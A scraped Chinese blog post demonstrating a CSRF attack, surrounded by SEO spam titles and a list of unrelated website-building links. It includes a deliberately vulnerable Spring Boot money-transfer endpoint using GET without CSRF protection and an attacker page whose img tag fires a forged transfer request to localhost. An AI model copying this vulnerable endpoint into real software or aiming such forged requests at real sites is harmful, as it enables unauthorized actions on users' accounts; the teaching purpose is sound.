当前位置: 首页 > news >正文

旅游网站的主要功能烟台网站建设团队

旅游网站的主要功能,烟台网站建设团队,网页开发与制作的软件,拼多多网站建设框架图目录 CSRF(跨站请求伪造)攻击演示CSRF 是什么CSRF 演示项目代码CSRF 演示过程服务启动演示 CSRF(跨站请求伪造)攻击演示 CSRF 是什么 CSRF#xff08;Cross-Site Request Forgery#xff09;跨站请求伪造#xff0c;是一种网络安全攻击#xff0c;其目标是利用被攻击者在… 目录 CSRF(跨站请求伪造)攻击演示CSRF 是什么CSRF 演示项目代码CSRF 演示过程服务启动演示 CSRF(跨站请求伪造)攻击演示 CSRF 是什么 CSRFCross-Site Request Forgery跨站请求伪造是一种网络安全攻击其目标是利用被攻击者在某个网站的身份通常是通过 cookie 认证来伪造被攻击者的请求以执行某些未经授权的操作。 攻击步骤通常包括以下几个阶段 登录受害者攻击者诱使受害者登录到一个受信任的网站并在受信任网站上保留了他们的身份认证凭据比如 cookie。构造恶意请求攻击者在其控制的网站上嵌入了一些恶意代码或链接这段代码或链接会向目标网站发送请求利用受信任网站上受害者的身份。发起攻击受害者在已经登录了的情况下访问包含恶意代码的页面这将导致向目标网站发送伪造的请求执行某些未经授权的操作。这可能包括更改密码、发起转账、删除帐户等。 CSRF 演示项目代码 演示代码github - csrf-demo 项目目录如下 其中业务后端 CsrfController.java 代码为 package com.fhb.csrfdemo;import org.springframework.web.bind.annotation.GetMapping; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RestController;import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpSession;RestController RequestMapping(/) public class CsrfController {GetMapping(/trans)public String trans(HttpServletRequest request, String name, Integer money) {HttpSession session request.getSession();Object people session.getAttribute(people);if (people null) return 没有登录;System.out.println(给 name 转账 money 元);return 转账成功;}GetMapping(/login)public String login(HttpServletRequest request) {HttpSession session request.getSession();session.setAttribute(people, people);return 登录成功;} }业务前端代码较为简单代码为 !doctype html html langen headmeta charsetUTF-8meta nameviewportcontentwidthdevice-width, user-scalableno, initial-scale1.0, maximum-scale1.0, minimum-scale1.0meta http-equivX-UA-Compatible contentieedgetitleDocument/title /head bodyh1CSRF 攻击测试/h1button onclicktrans()转账/buttonbutton onclicklogin()登录/buttona hrefhttp://localhost:18080恶意链接/a /bodyscript langjsasync function trans() {const response await fetch(/trans?namefhbmoney100);const info await response.text();alert(info);}async function login() {const response await fetch(/login);const info await response.text();alert(info);} /script /html恶意网站仅为一个 html 文件 !DOCTYPE html html langen headmeta charsetUTF-8meta nameviewport contentwidthdevice-width, initial-scale1.0titleDocument/title /head bodyh1CSRF攻击软件/h1img srchttp://localhost:8080/trans?namefffmoney10 altxxx srcset /bodyscript /script /htmlCSRF 演示过程 服务启动 启动 java 程序 CsrfDemoApplication该 Spring Boot 服务将在 8080 端口提供服务 通过 npm 安装 http-server进入 malicious-web 文件夹, 通过 http-server . -p 18080 启动攻击者网站; 业务网站 ui 如下 演示 通过 http://localhost:8080 访问目标网站。 如果直接点击 “转账” 按钮将弹出提示框提示 没有登录 如果点击 “登录”弹出提示框提示 登录成功之后点击转账提示 转账成功并且在后端打印 给fhb转账100元在第2步的基础上点击 “恶意连接”将跳转到攻击者网站并且在后端打印 给fff转账10元表示攻击成功。
http://www.ihoyoo.com/news/29987.html

相关文章:

  • 可以搭建分站的网站免费国外云服务器
  • 代刷网站只做软件吗用wordpress做微博
  • 深南花园裙楼+网站建设给别的公司提供网站建设
  • 在线听音乐网站建设做网站app要多钱
  • 人才招聘网站大全wordpress 4.7.2下载
  • 哪里网站做的好crm在线演示
  • 谷歌优化是什么意思整站seo怎么做
  • 机场网站建设需求广州优化网站排名
  • 网站建设只是wordpress foter
  • 视频logo免费生成网站制作网站管理系统
  • 站长工具站长之家官网中国建筑人才招聘官网
  • 浦东教育网站官网做淘宝客优惠券网站还是APP赚钱
  • 用WordPress做网站入门课wordpress收费阅读
  • 人才交流中心招聘网站建设方案淘宝运营推广
  • 网站开发与维护难吗自建服务器做网站要备案
  • 网站建设方案书简单最好的网站建设机构
  • 如何做测评视频网站设计国外网站
  • 用Html5做网站优秀企业网页设计
  • 电子商务网站建设中做网站的作文
  • 做视电影网站赚钱吗网络游戏定义
  • 无锡网站建设网页制作网站开发合同免费模板
  • 做网站需要懂什么技术网站推广方法是什么
  • 淘宝联盟自建网站教程乐都网站建设公司
  • 哈尔滨做平台网站平台公司哪家好外链代发免费
  • 信阳网站网站建设图片生成软件
  • 通辽做网站有没有wordpress响应主题
  • 电子商务自助建网站做相册的网站(网易
  • 关于网站开发的销售如何做网站稳定客户
  • 可信赖的坪山网站建设wordpress斜杠
  • ui网站推荐深圳网站设计哪家比较好